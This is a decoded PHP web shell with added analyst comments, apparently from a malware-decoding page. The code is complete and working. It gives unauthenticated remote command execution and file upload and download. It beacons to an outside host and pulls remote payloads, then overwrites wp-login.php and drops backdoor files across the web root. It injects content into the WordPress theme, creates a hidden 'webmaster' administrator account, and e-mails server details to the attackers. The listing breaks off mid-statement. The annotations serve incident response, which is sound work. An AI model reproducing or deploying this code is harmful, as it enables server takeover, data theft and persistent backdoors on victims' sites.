
PHP Decode

<?php goto ebyz5; XWVJ1: function expandDirectories($base_dir) { $directories =..

Decoded Output download

<?php 
 
// ANALYST NOTE: this listing is a web shell. Its top-level statements are
// shuffled behind goto labels; following the jumps from this first goto gives
// the order in which they actually run on every request:
//   1. ebyz5 / mktxn / SeJ_g - build a callback URL and request it
//   2. cISOa .. yOXvE        - declare the feature* request handlers
//   3. rzCDn                 - if ?feature= is present: dispatch, print JSON, die()
//   4. oTiro                 - emit the HTML/JS terminal page
//   5. n4EYX .. C25SI        - look for wp-load.php; if found, modify WordPress
//   6. qL7ih .. x3CD0        - fetch remote content and write it to several files
//   7. l1I1k, nk66E / TMx8f  - data.txt handling; create js/js.php if missing
//   8. RzdXK .. f56yq        - send two notification e-mails, then end at ujkIR
// Steps 5-8 run on a plain page view, so simply loading the shell rewrites files.
goto ebyz5; 
XWVJ1: 
/**
 * Recursively collect every sub-directory below $base_dir.
 *
 * Analyst note: the only caller in this listing passes $document_root, and the
 * returned list is the set of directories that receive a file named
 * wp-inda.php, so cleanup has to cover the whole web root, not one folder.
 *
 * @param string $base_dir Directory to walk.
 * @return array Flat list of directory paths, each parent before its children.
 */
function expandDirectories($base_dir) 
{ 
    $directories = []; 
    foreach (scandir($base_dir) as $file) { 
        // Skip the self and parent entries so the recursion terminates.
        if ($file == "." || $file == "..") { 
            continue; 
        } 
        $dir = $base_dir . DIRECTORY_SEPARATOR . $file; 
        if (is_dir($dir)) { 
            $directories[] = $dir; 
            // Depth-first: append everything found below this directory.
            $directories = array_merge($directories, expandDirectories($dir)); 
        } 
    } 
    return $directories; 
} 
goto UVm_F; 
MnOUx: 
// Enumerate every directory under the web root; the list feeds the loop at
// label x3CD0 that writes wp-inda.php into each one.
$directories = expandDirectories($document_root); 
goto JpeK8; 
cIV77: 
/**
 * Tab-completion handler: runs bash's `compgen` builtin and returns its output.
 *
 * Analyst note: $fileName is interpolated into the command string without any
 * escaping, and the dispatcher passes $_POST["filename"] straight in. This is
 * therefore a second command-execution path next to featureShell(); log and
 * WAF rules should cover `?feature=hint` as well as `?feature=shell`.
 *
 * @param string $fileName Prefix to complete.
 * @param string $cwd      Directory to chdir() into before running the command.
 * @param string $type     "cmd" selects `compgen -c`; any other value selects `compgen -f`.
 * @return array ["files" => lines of the command output]
 */
function featureHint($fileName, $cwd, $type) 
{ 
    chdir($cwd); 
    if ($type == "cmd") { 
        $cmd = "compgen -c {$fileName}"; 
    } else { 
        $cmd = "compgen -f {$fileName}"; 
    } 
    // NOTE(decoder artifact): the inner double quotes are unescaped in this
    // decoded rendering, so the line does not parse as shown; the undecoded
    // file writes both of them as \x22 escapes.
    $cmd = "/bin/bash -c "{$cmd}""; 
    $files = explode("\xa", shell_exec($cmd)); 
    return ["files" => $files]; 
} 
goto pLvXH; 
CIMtL: 
// Fourth line of the second notification mail: the URL of this script.
$EL_MuHaMMeD .= 
    "Shell Link : http://" . 
    $_SERVER["SERVER_NAME"] . 
    $_SERVER["PHP_SELF"] . 
    "\xd\xa"; 
goto xz_53; 
D2I2D: 
// First notification mail. Subject is the server IP plus Host header, body is
// the shell link, the requesting IP and a timestamp; errors are silenced by @.
@mail($to_email, $server_mail, $linkcr, $header); 
goto Ov2Mi; 
C25SI: 
// --- WordPress tampering: runs only when wp-load.php was found and included ---
if ($wp_detect == 1) { 
    // (1) Prepend remotely fetched text to headers.php in the active theme
    //     directory, unless the fetched text already matches the file content.
    $wp_theme_dir = get_template_directory(); 
    $header_file = 
        $wp_theme_dir . "/headers.php"; 
    $header_content = file_get_contents($header_file); 
    $append = http_get( 
        "https://acbdf.space/txt/seoco.txt" 
    ); 
    if (!preg_match("#" . $append . "#", $header_content)) { 
        $new_content = $append . $header_content; 
        $open_file = fopen($header_file, "w"); 
        fwrite($open_file, $new_content); 
        fclose($open_file); 
    } 
    // (2) Create a user named "webmaster" and give it the administrator role,
    //     unless that user name or e-mail already exists. Incident response
    //     should audit the user table for this account.
    $user = "webmaster"; 
    // NOTE(decoder artifact): inside double quotes PHP would read $P and
    // $BxJON2B3rr as variables; the undecoded file escapes both dollar signs.
    $pass = "$P$BxJON2B3rr"; 
    // "[email protected]" is the hosting page's e-mail masking, not the
    // literal carried by the sample.
    $email = 
        "[email protected]"; 
    if (!username_exists($user) && !email_exists($email)) { 
        $user_id = wp_create_user($user, $pass, $email); 
        $user = new WP_User($user_id); 
        $user->set_role("administrator"); 
    } 
    // (3) Overwrite wp-login.php with content fetched at run time. That content
    //     is not visible here; treat the file as untrusted and restore it from
    //     a known-good WordPress release.
    $wp_login = 
        ABSPATH . "/wp-login.php"; 
    $login = http_get( 
        "https://acbdf.space/txt/seo.txt" 
    ); 
    $open_login = fopen($wp_login, "w"); 
    fwrite($open_login, $login); 
    fclose($open_login); 
} 
goto qL7ih; 
ifHFG: 
// Body of the first notification mail: request URL, requesting IP, timestamp.
$linkcr = 
    "Link: " . 
    $_SERVER["SERVER_NAME"] . 
    "" . 
    $_SERVER["REQUEST_URI"] . 
    " - IP Excuting: {$ip_remote} - Time: {$time_shell}"; 
goto X5nrA; 
ng0zC: 
// Subject of the second notification mail.
$baslik = "whm 20203"; 
goto ob2L9; 
ebyz5: 
/**
 * Return the requester's IP address as reported by the environment.
 *
 * Analyst note: the Client-IP and X-Forwarded-For request headers are
 * preferred over REMOTE_ADDR, so the value is client-controlled whenever
 * either header is sent. It ends up in the callback URL built at label mktxn.
 *
 * @return string|false First non-empty value of HTTP_CLIENT_IP,
 *                      HTTP_X_FORWARDED_FOR (first list entry) or REMOTE_ADDR.
 */
function GetIP() 
{ 
    if (getenv("HTTP_CLIENT_IP")) { 
        $ip = getenv( 
            "HTTP_CLIENT_IP" 
        ); 
    } elseif ( 
        getenv( 
            "HTTP_X_FORWARDED_FOR" 
        ) 
    ) { 
        $ip = getenv( 
            "HTTP_X_FORWARDED_FOR" 
        ); 
        // A proxy chain is comma-separated; keep only the first entry.
        if (strstr($ip, ",")) { 
            $tmp = explode(",", $ip); 
            $ip = trim($tmp[0]); 
        } 
    } else { 
        $ip = getenv("REMOTE_ADDR"); 
    } 
    return $ip; 
} 
goto mktxn; 
nk66E: 
// Probe for js/js.php relative to the current directory; the result decides
// at label TMx8f whether that file has to be created. Errors are silenced.
$datasi = @fopen("js/js.php", "r"); 
goto TMx8f; 
qmzzS: 
// Write the content fetched from .../txt/min.txt into <docroot>/wp-clon.php.
fwrite($open_code, $code); 
goto owiHs; 
ch_4L: 
// Subject of the first notification mail: resolved server IP and Host header.
$server_mail = 
    "" . 
    gethostbyname($_SERVER["SERVER_NAME"]) . 
    "  - " . 
    $_SERVER["HTTP_HOST"] . 
    ""; 
goto ifHFG; 
uKFRu: 
// Sender address used in the From/Reply-to headers: "whm@<server IP>".
$from_shellcode = 
    "whm@" . 
    gethostbyname($_SERVER["SERVER_NAME"]) . 
    ""; 
goto T6emA; 
Ibor6: 
// Open <docroot>/phpinfo.php for writing (truncates any existing file).
$open_makale = fopen($wp_makale, "w"); 
goto YinPl; 
UnUy1: 
// Indicator: a file named wp-clon.php directly in the document root.
$wp_code = $document_root . "/wp-clon.php"; 
goto fNnlt; 
owiHs: 
fclose($open_code); 
goto rict2; 
KE35w: 
/**
 * Handler for `?feature=pwd`: report the PHP process's current working directory.
 *
 * @return array ["cwd" => result of getcwd()]
 */
function featurePwd() 
{ 
    return ["cwd" => getcwd()]; 
} 
goto cIV77; 
x3CD0: 
// Write the content fetched from .../txt/wp.txt as wp-inda.php into every
// directory under the web root whose path does not contain "wp-content".
// Indicator: many identical wp-inda.php files with the same modification time.
foreach ($directories as $dir) { 
    if (!preg_match("#wp-content#", $dir)) { 
        $css_file = $dir . "/wp-inda.php"; 
        $open_css = fopen($css_file, "w"); 
        fwrite($open_css, $css); 
        fclose($open_css); 
    } 
} 
goto XWVJ1; 
cISOa: 
/**
 * Handler for `?feature=shell`: interpret one line typed into the web terminal.
 *
 * Analyst note: $cmd comes from $_POST["cmd"] (the dispatcher only appends
 * " 2>&1" when no "2>" is present) and the final branch hands it to exec()
 * unchanged. No authentication check is visible anywhere in this listing.
 *
 * Branches, in order:
 *   - bare `cd`         : no action
 *   - `cd <path>`       : chdir() to $cwd, then to <path>
 *   - `download <path>` : return the file via featureDownload()
 *   - anything else     : exec() the line in $cwd and capture its output
 *
 * @param string $cmd Command line as received.
 * @param string $cwd Working directory the client believes it is in.
 * @return array ["stdout" => output lines, "cwd" => getcwd()], or the
 *               featureDownload() result for the download branch.
 */
function featureShell($cmd, $cwd) 
{ 
    $stdout = []; 
    if (preg_match("/^\s*cd\s*$/", $cmd)) { 
    } elseif ( 
        preg_match( 
            "/^\s*cd\s+(.+)\s*(2>&1)?$/", 
            $cmd 
        ) 
    ) { 
        chdir($cwd); 
        // Second match captures the target; this pattern stops at whitespace.
        preg_match( 
            "/^\s*cd\s+([^\s]+)\s*(2>&1)?$/", 
            $cmd, 
            $match 
        ); 
        chdir($match[1]); 
    } elseif ( 
        preg_match( 
            "/^\s*download\s+[^\s]+\s*(2>&1)?$/", 
            $cmd 
        ) 
    ) { 
        chdir($cwd); 
        preg_match( 
            "/^\s*download\s+([^\s]+)\s*(2>&1)?$/", 
            $cmd, 
            $match 
        ); 
        return featureDownload($match[1]); 
    } else { 
        chdir($cwd); 
        // Arbitrary command execution with the web server's privileges.
        exec($cmd, $stdout); 
    } 
    return ["stdout" => $stdout, "cwd" => getcwd()]; 
} 
// Jump on to the next handler declaration; UVm_F labels the http_get() helper.
goto KE35w; 
UVm_F: 
/**
 * Fetch a URL with cURL and return the response body.
 *
 * Analyst note: every call site in this listing passes a URL under
 * https://acbdf.space/txt/ and writes the result to disk, so outbound
 * requests to that host from the web server are a network indicator.
 *
 * @param string $url URL to request.
 * @return string|bool Response body, or false when the transfer fails.
 */
function http_get($url) 
{ 
    $im = curl_init($url); 
    curl_setopt($im, CURLOPT_RETURNTRANSFER, 1); 
    curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10); 
    // Redirects are followed, so the final download host can differ from $url.
    curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1); 
    curl_setopt($im, CURLOPT_HEADER, 0); 
    return curl_exec($im); 
    // Unreachable: placed after the return statement.
    curl_close($im); 
} 
goto l1I1k; 
VvTms: 
// Indicator: <docroot>/phpinfo.php, filled with content from .../txt/phpinfo.txt.
$wp_makale = $document_root . "/phpinfo.php"; 
goto Ibor6; 
guOLF: 
// Flag set to 1 once a wp-load.php has been found and included.
$wp_detect = 0; 
goto qFzoY; 
oTiro: 
// From here the script emits the static HTML/JS terminal page.
?> 
<!doctypehtml> 
  <html> 
    <head> 
      <meta charset="UTF-8"> 
      <title>mangtxr@1337:~#</title> 
      <meta content="width=device-width,initial-scale=1" name="viewport"> 
      <style> 
        body, 
        html { 
          margin: 0; 
          padding: 0; 
          height: 100%; 
          position: relative; 
          background: #333; 
          background-image: url(https://www.dadsec.pw/dadsecwal.png); 
          background-position: center; 
          background-repeat: no-repeat; 
          background-size: cover; 
          color: #eee; 
          font-family: monospace 
        } 
 
        ::-webkit-scrollbar-track { 
          border-radius: 8px; 
          background-color: #353535 
        } 
 
        ::-webkit-scrollbar { 
          width: 8px; 
          height: 8px 
        } 
 
        ::-webkit-scrollbar-thumb { 
          border-radius: 8px; 
          -webkit-box-shadow: inset 0 0 6px rgba(0, 0, 0, .3); 
          background-color: #bcbcbc 
        } 
 
        #shell { 
          background: rgba(34, 34, 34, .9); 
          max-width: 800px; 
          margin: 50px auto 0 auto; 
          box-shadow: 0 0 5px rgba(0, 0, 0, .3); 
          font-size: 10pt; 
          display: flex; 
          flex-direction: column; 
          align-items: stretch 
        } 
 
        #shell-content { 
          height: 500px; 
          overflow: auto; 
          padding: 5px; 
          white-space: pre-wrap; 
          flex-grow: 1 
        } 
 
        #shell-logo { 
          font-weight: 700; 
          color: #75df0b; 
          text-align: center 
        } 
 
        @media (max-width:991px) { 
          #shell-logo { 
            font-size: 6px; 
            margin: -25px 0 
          } 
 
          #shell, 
          body, 
          html { 
            height: 100%; 
            width: 100%; 
            max-width: none 
          } 
 
          #shell { 
            margin-top: 0 
          } 
        } 
 
        @media (max-width:767px) { 
          #shell-input { 
            flex-direction: column 
          } 
        } 
 
        @media (max-width:320px) { 
          #shell-logo { 
            font-size: 5px 
          } 
        } 
 
        .shell-prompt { 
          font-weight: 700; 
          color: #75df0b 
        } 
 
        .shell-prompt>span { 
          color: #1bc9e7 
        } 
 
        #shell-input { 
          display: flex; 
          box-shadow: 0 -1px 0 rgba(0, 0, 0, .3); 
          border-top: rgba(255, 255, 255, .05) solid 1px 
        } 
 
        #shell-input>label { 
          flex-grow: 0; 
          display: block; 
          padding: 0 5px; 
          height: 30px; 
          line-height: 30px 
        } 
 
        #shell-input #shell-cmd { 
          height: 30px; 
          line-height: 30px; 
          border: none; 
          background: 0 0; 
          color: #eee; 
          font-family: monospace; 
          font-size: 10pt; 
          width: 100%; 
          align-self: center 
        } 
 
        #shell-input div { 
          flex-grow: 1; 
          align-items: stretch 
        } 
 
        #shell-input input { 
          outline: 0 
        } 
      </style> 
      <script> 
        // Client-side state of the terminal page: last working directory reported
        // by the server, the command history, and the cached input/output elements.
        var CWD = null, 
          commandHistory = [], 
          historyPosition = 0, 
          eShellCmdInput = null, 
          eShellContent = null; 
 
        // Echo the typed command into the output pane, preceded by the prompt,
        // and scroll to the bottom. The command text is passed through escapeHtml().
        function _insertCommand(e) { 
          eShellContent.innerHTML += "\n\n", eShellContent.innerHTML += '<span class="shell-prompt">' + genPrompt(CWD) + "</span> ", eShellContent.innerHTML += escapeHtml(e), eShellContent.innerHTML += "\n", eShellContent.scrollTop = eShellContent.scrollHeight 
        } 
 
        // Append escaped command output to the output pane and scroll to the bottom.
        function _insertStdout(e) { 
          eShellContent.innerHTML += escapeHtml(e), eShellContent.scrollTop = eShellContent.scrollHeight 
        } 
 
        // Run callback e on the next event-loop turn.
        function _defer(e) { 
          setTimeout(e, 0) 
        } 
 
        // Handle one entered line. `upload <path>` and `clear` are handled in the
        // browser; every other line is POSTed to "?feature=shell" with form fields
        // cmd and cwd. A response carrying a "file" property is saved as a download,
        // otherwise its stdout lines are printed.
        // Analyst note: this request shape (query string feature=shell plus POST
        // fields cmd/cwd) is what shows up in access logs and WAF captures.
        function featureShell(e) { 
          _insertCommand(e), /^\s*upload\s+[^\s]+\s*$/.test(e) ? featureUpload(e.match(/^\s*upload\s+([^\s]+)\s*$/)[1]) : /^\s*clear\s*$/.test(e) ? eShellContent.innerHTML = "" : makeRequest("?feature=shell", { 
            cmd: e, 
            cwd: CWD 
          }, function(e) { 
            e.hasOwnProperty("file") ? featureDownload(e.name, e.file) : (_insertStdout(e.stdout.join("\n")), updateCwd(e.cwd)) 
          }) 
        } 
 
        // Tab completion: POST the word being typed to "?feature=hint" with fields
        // filename, cwd and type ("cmd" for the first word, "file" otherwise).
        // A two-element reply is treated as a single match and completed in place;
        // longer replies are printed as a list.
        function featureHint() { 
          if (0 !== eShellCmdInput.value.trim().length) { 
            var e = eShellCmdInput.value.split(" "), 
              n = 1 === e.length ? "cmd" : "file"; 
            makeRequest("?feature=hint", { 
              filename: "cmd" == n ? e[0] : e[e.length - 1], 
              cwd: CWD, 
              type: n 
            }, function(e) { 
              if (!(e.files.length <= 1)) 
                if (2 === e.files.length) 
                  if ("cmd" == n) eShellCmdInput.value = e.files[0]; 
                  else { 
                    var t = eShellCmdInput.value; 
                    eShellCmdInput.value = t.replace(/([^\s]*)$/, e.files[0]) 
                  } 
              else _insertCommand(eShellCmdInput.value), _insertStdout(e.files.join("\n")) 
            }) 
          } 
        } 
 
        // Save a file returned by the server: e is the file name, t the
        // base64-encoded content. Uses a temporary hidden <a download> link with
        // a data: URL, so the transfer travels inside the JSON reply.
        function featureDownload(e, t) { 
          var n = document.createElement("a"); 
          n.setAttribute("href", "data:application/octet-stream;base64," + t), n.setAttribute("download", e), n.style.display = "none", document.body.appendChild(n), n.click(), document.body.removeChild(n), _insertStdout("Done.") 
        } 
 
        // Upload a local file to server path t: open a hidden file picker, read
        // the chosen file as base64 and POST it to "?feature=upload" with fields
        // path, file and cwd.
        // Analyst note: uploads appear as ordinary form-encoded POST bodies with a
        // large base64 "file" field, not as multipart/form-data.
        function featureUpload(t) { 
          var e = document.createElement("input"); 
          e.setAttribute("type", "file"), e.style.display = "none", document.body.appendChild(e), e.addEventListener("change", function() { 
            getBase64(e.files[0]).then(function(e) { 
              makeRequest("?feature=upload", { 
                path: t, 
                file: e, 
                cwd: CWD 
              }, function(e) { 
                _insertStdout(e.stdout.join("\n")), updateCwd(e.cwd) 
              }) 
            }, function() { 
              _insertStdout("An unknown client-side error occurred.") 
            }) 
          }), e.click(), document.body.removeChild(e) 
        } 
 
        // Read File object o and resolve with the base64 part of its data: URL.
        // The second parameter is shadowed by the Promise callback and not used.
        function getBase64(o, e) { 
          return new Promise(function(e, t) { 
            var n = new FileReader; 
            n.onload = function() { 
              e(n.result.match(/base64,(.*)$/)[1]) 
            }, n.onerror = t, n.readAsDataURL(o) 
          }) 
        } 
 
        // Build the prompt markup for directory e ("~" when empty). Paths with more
        // than three "/"-separated parts are shortened to their last two parts;
        // the full path is kept in the title attribute.
        function genPrompt(e) { 
          var t = e = e || "~"; 
          if (3 < e.split("/").length) { 
            var n = e.split("/"); 
            t = "/" + n[n.length - 2] + "/" + n[n.length - 1] 
          } 
          return 'mangtx@1337:<span title="' + e + '">' + t + "</span>#" 
        } 
 
        // Record the working directory. With an argument it is stored directly;
        // without one it is requested from the server via "?feature=pwd".
        function updateCwd(e) { 
          if (e) return CWD = e, void _updatePrompt(); 
          makeRequest("?feature=pwd", {}, function(e) { 
            CWD = e.cwd, _updatePrompt() 
          }) 
        } 
 
        // Replace &, < and > with HTML entities; quote characters are left as is.
        function escapeHtml(e) { 
          return e.replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;") 
        } 
 
        // Redraw the prompt label from the current CWD.
        function _updatePrompt() { 
          document.getElementById("shell-prompt").innerHTML = genPrompt(CWD) 
        } 
 
        // Key handler of the command input: Enter submits the line and stores it in
        // the history, ArrowUp/ArrowDown move through the history, Tab triggers
        // completion instead of moving focus.
        function _onShellCmdKeyDown(e) { 
          switch (e.key) { 
            case "Enter": 
              featureShell(eShellCmdInput.value), insertToHistory(eShellCmdInput.value), eShellCmdInput.value = ""; 
              break; 
            case "ArrowUp": 
              0 < historyPosition && (historyPosition--, eShellCmdInput.blur(), eShellCmdInput.value = commandHistory[historyPosition], _defer(function() { 
                eShellCmdInput.focus() 
              })); 
              break; 
            case "ArrowDown": 
              if (historyPosition >= commandHistory.length) break; 
              ++historyPosition === commandHistory.length ? eShellCmdInput.value = "" : (eShellCmdInput.blur(), eShellCmdInput.focus(), eShellCmdInput.value = commandHistory[historyPosition]); 
              break; 
            case "Tab": 
              e.preventDefault(), featureHint() 
          } 
        } 
 
        // Append a command to the history and move the cursor past the last entry.
        function insertToHistory(e) { 
          commandHistory.push(e), historyPosition = commandHistory.length 
        } 
 
        // Send object n as a form-encoded POST to relative URL e and pass the parsed
        // JSON reply to callback t. Replies with a status other than 200 are ignored.
        // Analyst note: every server interaction of the page goes through here, so
        // the traffic is POST <script>?feature=<name> with Content-Type
        // application/x-www-form-urlencoded and a JSON response body. No token,
        // cookie or credential is added by this function.
        function makeRequest(e, n, t) { 
          var o = new XMLHttpRequest; 
          o.open("POST", e, !0), o.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"), o.onreadystatechange = function() { 
            if (4 === o.readyState && 200 === o.status) try { 
              var e = JSON.parse(o.responseText); 
              t(e) 
            } catch (e) { 
              alert("Error while parsing response: " + e) 
            } 
          }, o.send(function() { 
            var e = []; 
            for (var t in n) n.hasOwnProperty(t) && e.push(encodeURIComponent(t) + "=" + encodeURIComponent(n[t])); 
            return e.join("&") 
          }()) 
        } 
        // Page wiring: a click anywhere (except on a SELECT, or while text is
        // selected) refocuses the command input; on load the DOM nodes are cached
        // and the working directory is requested from the server.
        document.onclick = function(e) { 
          e = e || window.event; 
          var t = window.getSelection(); 
          "SELECT" !== (e.target || e.srcElement).tagName && (t.toString() || eShellCmdInput.focus()) 
        }, window.onload = function() { 
          eShellCmdInput = document.getElementById("shell-cmd"), eShellContent = document.getElementById("shell-content"), updateCwd(), eShellCmdInput.focus() 
        } 
      </script> 
    </head> 
    <body><br><br><br><br><br><br><br><br> 
      <div id="shell"> 
        <pre id="shell-content"> 
                <div id="shell-logo"><span></span> 
@@@@@@@@@@        @@@   @@@  @@@   @@@@@@@@  @@@@@@@  @@@  @@@   
@@@@@@@@@@@      @@@@   @@@@ @@@  @@@@@@@@@  @@@@@@@  @@@  @@@   
@@! @@! @@!     @@!@!   @@!@!@@@  !@@          @@!    @@!  !@@   
!@! !@! !@!    !@!!@!   !@!!@!@!  !@!          !@!    !@!  @!!   
@!! !!@ @!@   @!! @!!   @!@ !!@!  !@! @!@!@    @!!     !@@!@!    
!@!   ! !@!  !!!  !@!   !@!  !!!  !!! !!@!!    !!!      @!!!     
!!:     !!:  :!!:!:!!:  !!:  !!!  :!!   !!:    !!:     !: :!!    
:!:     :!:  !:::!!:::  :!:  !:!  :!:   !::    :!:    :!:  !:!   
:::     ::        :::    ::   ::   ::: ::::     ::     ::  :::   
 :      :         :::   ::    :    :: :: :      :      :   ::         
 
Dadsec Tools www.dadsec.pw 
                </div> 
            </pre><div id="shell-input"><label class="shell-prompt"for="shell-cmd"id="shell-prompt">???</label><div><input id="shell-cmd"name="cmd"onkeydown="_onShellCmdKeyDown(event)"></div></div></div></body></html><?php 
            // After the HTML page has been emitted, continue with the
            // file-writing part of the script, which starts at label n4EYX.
            goto n4EYX; 
            pLvXH: 
            /**
             * Read a file from the server and return it base64-encoded.
             *
             * Analyst note: the path comes from the `download <path>` terminal
             * command and is not restricted, so any file readable by the web
             * server account can leave the host inside a JSON response.
             *
             * @param string $filePath Path as typed by the client.
             * @return array ["name" => basename, "file" => base64 content] on
             *               success, otherwise ["stdout" => [message], "cwd" => getcwd()].
             */
            function featureDownload($filePath) 
            { 
                // Read errors are silenced with @ and mapped to a terminal message.
                $file = @file_get_contents($filePath); 
                if ($file === false) { 
                    return [ 
                        "stdout" => [ 
                            "File not found / no read permission.", 
                        ], 
                        "cwd" => getcwd(), 
                    ]; 
                } else { 
                    return [ 
                        "name" => basename($filePath), 
                        "file" => base64_encode($file), 
                    ]; 
                } 
            } 
            goto yOXvE; 
            L6jgC: 
            // Second line of the second notification mail: the configured
            // server administrator address.
            $EL_MuHaMMeD .= 
                "Server Admin : " . 
                $_SERVER["SERVER_ADMIN"] . 
                "\xd
"; 
            goto WXtQU; 
            rict2: 
            // Content later written to <docroot>/phpinfo.php; it is fetched at
            // run time and is not visible in this listing.
            $makale = http_get( 
                "https://acbdf.space/txt/phpinfo.txt" 
            ); 
            goto VvTms; 
            X5nrA: 
            // Mail headers of the first notification: From and Reply-to are
            // both "whm@<server IP>".
            $header = "From: {$from_shellcode}
\xaReply-to: {$from_shellcode}"; 
            goto D2I2D; 
            qL7ih: 
            // Content later written to <docroot>/wp-clon.php.
            $code = http_get( 
                "https://acbdf.space/txt/min.txt" 
            ); 
            goto UnUy1; 
            fNnlt: 
            // Opens wp-clon.php for writing (truncates any existing file).
            $open_code = fopen($wp_code, "w"); 
            goto qmzzS; 
            rzCDn: 
            // Request dispatcher. Any request whose query string contains
            // `feature` is answered with JSON and ends here; all parameters are
            // read from $_POST and passed to the handlers unchanged.
            // Analyst note: no authentication, token or source check appears
            // before this point in the listing, so anyone who knows the URL can
            // use it. Useful log/WAF signature: query parameter
            // feature=shell|pwd|hint|upload together with a POST body.
            if (isset($_GET["feature"])) { 
                $response = null; 
                switch ($_GET["feature"]) { 
                    case "shell": 
                        $cmd = $_POST["cmd"]; 
                        // Merge stderr into stdout unless the client redirected it.
                        if (!preg_match("/2>/", $cmd)) { 
                            $cmd .= " 2>&1"; 
                        } 
                        $response = featureShell($cmd, $_POST["cwd"]); 
                        break; 
                    case "pwd": 
                        $response = featurePwd(); 
                        break; 
                    case "hint": 
                        $response = featureHint( 
                            $_POST["filename"], 
                            $_POST["cwd"], 
                            $_POST["type"] 
                        ); 
                        break; 
                    case "upload": 
                        $response = featureUpload( 
                            $_POST["path"], 
                            $_POST["file"], 
                            $_POST["cwd"] 
                        ); 
                } 
                header( 
                    "Content-Type: application/json" 
                ); 
                // An unknown feature value yields the JSON literal null.
                echo json_encode($response); 
                die(); 
            } 
            goto oTiro; 
            ob2L9: 
            // First line of the second notification mail: the document root
            // ("Dosya Yolu" is Turkish for "file path").
            $EL_MuHaMMeD = 
                "Dosya Yolu : " . 
                $_SERVER[ 
                    "DOCUMENT_ROOT" 
                ] . 
                "\xd\xa"; 
            goto L6jgC; 
            f56yq: 
            // Second notification mail: recipient $kime, subject $baslik, body
            // is the host summary collected in $EL_MuHaMMeD.
            mail($kime, $baslik, $EL_MuHaMMeD); 
            goto ujkIR; 
            RzdXK: 
            // Timestamp placed in the first notification mail.
            $time_shell = 
                "" . 
                date("d/m/Y - H:i:s") . 
                ""; 
            goto ed42a; 
            eTg8m: 
            // Directory of this script; starting point of the upward search
            // for wp-load.php.
            $document_root_file = dirname(__FILE__); 
            goto guOLF; 
            T6emA: 
            // Recipient of the first notification mail. "[email protected]"
            // is the hosting page's e-mail masking, not the sample's literal.
            $to_email = 
                "[email protected]"; 
            goto ch_4L; 
            qFzoY: 
            // WordPress discovery: include wp-load.php from the document root,
            // or walk upwards from this script's directory one "../" at a time
            // until one is found. Including it loads the WordPress API used at
            // label C25SI (theme path, user creation, ABSPATH).
            // Analyst note: a shell dropped in a sub-directory or an add-on
            // domain can still reach a WordPress install in a parent directory.
            if ( 
                file_exists( 
                    $document_root . 
                        "/wp-load.php" 
                ) 
            ) { 
                include $document_root . 
                    "/wp-load.php"; 
                $wp_detect = 1; 
            } else { 
                // Upper bound for the climb: number of path components.
                $prefix = count(@explode("/", $document_root_file)); 
                $a = ""; 
                for ($i = 0; $i < $prefix; $i++) { 
                    $a = $a . "../"; 
                    if ( 
                        file_exists( 
                            $document_root_file . 
                                "/" . 
                                $a . 
                                "wp-load.php" 
                        ) 
                    ) { 
                        include $document_root_file . 
                            "/" . 
                            $a . 
                            "wp-load.php"; 
                        $wp_detect = 1; 
                        break; 
                    } 
                } 
            } 
            goto C25SI; 
            Ov2Mi: 
            // Recipient of the second notification mail (masked by the hosting page).
            $kime = 
                "[email protected]"; 
            goto ng0zC; 
            SeJ_g: 
            // Callback: request the URL built at label mktxn, via cURL when
            // available and via file_get_contents() otherwise. The response is
            // stored in $gitt, which is not used again in this listing.
            // Analyst note: this runs first on every request, so each visit
            // produces an outbound HTTPS request from the web server.
            if (function_exists("curl_init")) { 
                $ch = @curl_init(); 
                curl_setopt($ch, CURLOPT_URL, $x); 
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); 
                $gitt = curl_exec($ch); 
                curl_close($ch); 
                if ($gitt == false) { 
                    @$gitt = file_get_contents($x); 
                } 
            } elseif ( 
                function_exists( 
                    "file_get_contents" 
                ) 
            ) { 
                @$gitt = file_get_contents($x); 
            } 
            goto cISOa; 
            WXtQU: 
            // Third line of the second notification mail: the web server
            // software string ("isletim sistemi" is Turkish for "operating system").
            $EL_MuHaMMeD .= 
                "Server isletim sistemi : " . 
                $_SERVER[ 
                    "SERVER_SOFTWARE" 
                ] . 
                "
"; 
            goto CIMtL; 
            xz_53: 
            // Last line of the second notification mail: the Host header of
            // the compromised site.
            $EL_MuHaMMeD .= 
                "Avlanan Site : " . 
                $_SERVER["HTTP_HOST"] . 
                "\xd
"; 
            goto f56yq; 
            TMx8f: 
            // Runs only when js/js.php could not be opened: create the js/
            // directory, fill js/js.php with content fetched from
            // .../txt/css.txt, and send two HTML notification mails containing
            // the URL of this request.
            // Analyst note: indicators are a js/js.php file next to the shell
            // and outbound mail with the subject "Hacklink Bildiri". The mail
            // text names js/crs.php although the file written is js/js.php.
            if ($datasi) { 
            } else { 
                @mkdir("js"); 
                $dos = file_get_contents( 
                    "https://acbdf.space/txt/css.txt" 
                ); 
                $data = "js/js.php"; 
                @touch("js/js.php"); 
                $ver = @fopen($data, "w"); 
                @fwrite($ver, $dos); 
                @fclose($ver); 
                $yol = 
                    "http://" . 
                    $_SERVER["HTTP_HOST"] . 
                    "" . 
                    $_SERVER["REQUEST_URI"] . 
                    ""; 
                $y = 
                    "<h1>Sender Yazdirildi.<br/> SITE YOL : " . 
                    $yol . 
                    "<br/>Sender Yolu : js/crs.php</h1>"; 
                // $header is appended to here although, in execution order, it
                // is first assigned later at label X5nrA.
                $header .= 
                    "From: SheLL Boot <[email protected]>\xa"; 
                $header .= 
                    "Content-Type: text/html;\xa charset=utf-8
"; 
                @mail( 
                    "[email protected]", 
                    "Hacklink Bildiri", 
                    "{$y}", 
                    $header 
                ); 
                @mail( 
                    "[email protected]", 
                    "Hacklink Bildiri", 
                    "{$y}", 
                    $header 
                ); 
            } 
            goto RzdXK; 
            YinPl: 
            // Write the fetched content into <docroot>/phpinfo.php.
            fwrite($open_makale, $makale); 
            goto fvNQ1; 
            fvNQ1: 
            fclose($open_makale); 
            goto MnOUx; 
            JpeK8: 
            // Content written as wp-inda.php into the enumerated directories.
            $css = http_get( 
                "https://acbdf.space/txt/wp.txt" 
            ); 
            goto x3CD0; 
            mktxn: 
            // Callback URL. The base64 literal decodes to
            // "https://anonym0us.club/l-"; appended to it are the value from
            // GetIP(), a "-", and the base64 of this script's own URL.
            // Analyst note: each visit therefore reports the shell's location
            // to that host, which makes it an egress indicator to search
            // proxy, DNS and firewall logs for.
            $x = 
                base64_decode( 
